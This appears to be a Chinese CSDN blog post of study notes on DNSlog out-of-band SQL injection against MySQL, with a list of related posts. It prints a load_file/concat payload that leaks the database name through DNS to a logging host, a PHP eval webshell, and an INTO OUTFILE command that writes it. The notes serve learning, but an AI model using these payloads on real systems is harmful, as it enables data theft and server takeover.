Dns注入

已于 2022-09-21 19:59:51 修改
阅读量678 收藏 2
点赞数 1
分类专栏: 渗透原理篇 文章标签: 安全
于 2022-09-20 21:14:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58000413/article/details/126959945
版权

注意:仅用于本人学习的笔记记录,禁止进行传播分享,一旦造成严重后果与本人无关!!!

一、DNSLOG的使用场景

DNS-LOG:DNS服务(LOG日志)=>DNS解析日志

dns-log注入:obb(数据外带)

假设你在SQL注入的时候,让数据库发起网络请求,然后就会记录你的内容

database().hjw.com        =>日志就会记录

使用场景:

        1.目标是盲注        盲注=>转换为dnslog注入

        2.目标可以访问外网

二、DNSLOG的函数解析

Mysql函数:LOAD_FILE()

        load_file        读取文件的函数

        LOAD_FILE(绝对路径)        记得反斜杠

        mysql稍微高一点的版本,默认是不可以读取内容的

        mysql.ini  =>  末尾添加  secure_file_priv=""

文件共享(UNC路径)访问的东西都是把他当做文件处理

        \\desktop-admin\123\        支持域名支持ip

select load_file(concat('//',database(),'.75a1bbbd.dnsbug.cn/123'));

   

DNS-LOG注入 linux能不能用的话[一般不能dnslog注入,除非搭建smb服务]

写shell:

        load_file        开启了就能写shell        

        webshell        =>网站木马

        <?php eval($_REQUEST[8])?>     =>  当做后端代码执行

into outfile             into dumpfile

select  "<?php eval($_REQUEST[8])>?"  into  outfile  "F:/1.php";

不习惯有你
关注
专栏目录
sqlmap_dns注入配置方法
KHOST的博客
07-17 791
网上针对sqlmap进行dns注入的相关文章太少,只是简单介绍了下--dns-domain参数,相关的实战文章要么就写的模糊或者一笔带过,搞的云里雾里(主要是菜,关键还没大佬带)。然后自己参考网上的方法自己重新搞了一遍。 0X00 需要准备的东西,sqlmap、windows盲注一个、两个域名、一台外网服务器。 某次搞事情的时候碰到一个时间盲注,碰巧是台windows的,想起dns注入的方法。 在开始前我准备先用sqlmap的--sql-shell 命令进行dns注入payloa..
DNS注入
nobugnomoney的博客
09-11 1364
1.我们首先要知道什么是DNS: 域名解析是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一种服务。IP地址是网络上标识站点的数字地址,为了方便记忆,采用域名来代替IP地址标识站点地址。域名解析就是域名到IP地址的转换过程。域名的解析工作由DNS服务器完成。 域名解析也叫域名指向、服务器设置、域名配置以及反向IP登记等等。说得简单点就是将好记的域名解析成IP,服务由DNS服务器完成,是把域名解析到一个IP地址,然后在此IP地址的主机上将一个子目录与域名绑定。 互联网中的地址是数字的IP地
MySQL注入Dns 注入
最新发布
baimaozi008的博客
05-29 1116
本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。然后1806dl.dnslog.cn的子域名的解析都是在某台服务器,然后他记录下来了有人请求访问了error.1806dl.dnslog.cn,然后在DnsLog这个平台上面显示出来了。
MySQL-DNS注入
weixin_45634365的博客
03-03 289
一、DNS注入的原理 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录,将盲注变为显错注入 即读取远程共享文件,拼接出函数,进行查询,再拼接到域名中,访问时将访问服务器,记录后查看日志 对于sql盲注,常见的方法是使用二分法一个个猜,但是这样的方法很麻烦,还很容易因为数据请求频繁导致被禁 所以可以将查询到的数据发送给一个URL,利用DNS解析产生的记录日志
封神台MYSQL 注入 - Dns注入
qq_40941912的博客
10-05 1169
一、原理 DNSLOG的使用场景: 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban。 所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 LOAD_FILE()读取文件的函数 读取文件并返回文件内容为字符串。要使用此函数,文件必须位于服务器主机上,必须指定完整路径的文件,而且必须有FILE权限。
数据库注入学习笔记2---MySQL注入DNS注入
qq_41759633的博客
08-07 295
引:DNS注入并不是对DNS服务器进行注入,而是利用DNS解析的时候会留下的有用的日志,简称:DNS log注入。 条件:有SQL盲注(或时间)注入的站点,可是用sqlmap跑需要频繁请求,最后导致ip被ban。 发现疑似命令注入的洞,但是目标站点不显示,无法确认是不是有漏洞 目标不让信息显示出来,如能发送请求,那么就可以尝试咱这个办法----用DNS log来获取回显(一般为root权限) 首先...
mysql——DNS注入
qq_45300786的博客
08-09 1789
DNS log 【DNS日志注入DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求 DNS注入的核心,将盲注转化为显错注入 DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求 比如 ox.qidao.com => DNS记录了这个请求, 那么我们也可以让mysql也能发出请求,DNS也会记录 ...
小结--dns注入
weixin_30300523的博客
05-26 182
0x01 杂言 最近实在是太忙了,考试都排满了,晚上刚考完,补一下昨天的东西,写一下dns注入。 我们知道在盲注的时候,要用脚本去跑,在测试的时候效率就不是很高,这时候用dns注入往往事半功倍 0x02 payload 这里直接贴一下payload LOAD_FILE(CONCAT(0x5C5C,(HEX(USER())),0x2E3563733076642E636579652E696F5C313...
17、注入篇--DNS注入(MySQL)
WX公众号-小白学安全
04-10 911
DNS注入 DNS注入也称DNS带外注入DNSLog注入 DNSDNS(Domain Name System)域名系统,将域名与IP地址相互映射的一个分布式数据库 DNS注入核心是 将盲注变为显错注入 DNS-log ​ DNS服务器的解析记录 注入基础 1、load_file() 读取文件的函数 ​ 读取文件并返回文件内容为字符串 ​ 要使用此函数文件必须位于主服务器上,必须指定完整路径的文件,而且必须有file权限 ​ 该文件所有字节可读,但文件内容必须小于max_allower_packe
SQL注入(Dns注入)---zkaq
weixin_38237216的博客
04-11 1787
1.概念 1.DNS-log:DNS是解析域名的,log是日志记录,DNS-log是记录域名解析记录日志 2.使用场景:在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 3.涉及的函数:LOAD_FILE():读取文件的函数—读取文件并返回文件内容为字符串 ​ a.配置文件中的参数secure_file_priv= ​ b.高版本mysql中会限制 ​ c.既然会被限制那有什么用呢?但是也会存在下面几种情况 有的版本会自动开启 有的网站需要
web安全入门(第五章-3)dns注入
Yzz_的博客
06-02 339
一、DNSLOG的函数解析 1,基本 DNS(协议 域名 -> IP转换) 日志:基本上所有程序都会记录日志 DNS 他实际上也是有日志的 补充:问:DNSlog注入是不是在linx系统可不可以用SMB服务? (全称是Server Message Block , 用于在计算机间共享文件、打印机、串口等,电脑上的网上邻居由它实现。) 答:在linx里面默认不可以使用,因为linx没有这个服务 2,函数用法: select
SQL注入篇——dns回显注入
爱国小白帽
02-10 2015
dns回显注入的使用场景 当目标无显示位也无错误回显时便可使用此方法 1、首先使用网站http://www.dnslog.cn/点击此处获取dns地址 2、将获取到的地址复制填入SQL语句中执行 注意:每次获取到的dns地址都不同,改变时替换注入语句中标红部分即可 注入语句: id=1’ and load_file(concat("\\",(database()),".2bmfvu.dnslo...
DNS中的SQL注入攻击
netsec_steven的博客
10-09 1964
0x00 前言 原文地址:http://arxiv.org/ftp/arxiv/papers/1303/1303.3047.pdf 原文作者: Miroslav tampar 本文描述了一种利用DNS解析过程获取恶意SQL查询结果的先进的SQL注入技术。带有sql查询结果的DNS请求最终被攻击者控制的远程域名服务器拦截并提取出宝贵的数据。 开源SQL注入工具—SqlMap现在已
DNSLOG 注入
qq_33441500的博客
10-21 729
DNSLOG 注入 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过DNSlog把想获...
DNS_LOG注入
学习、分享、交流
05-19 1634
DNSLOG注入:利用DNS解析,日志记录把数据库里面的内容给带出来···
SQL注入攻击详解与防御策略
- DNS注入:利用DNS查询延迟来获取信息。 四、MySQL中的函数与查询 了解MySQL中的函数和表对于进行SQL注入至关重要。例如,`SELECT`函数用于查询数据,`UNION`用于合并多个查询结果,而默认表如`information_schema...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值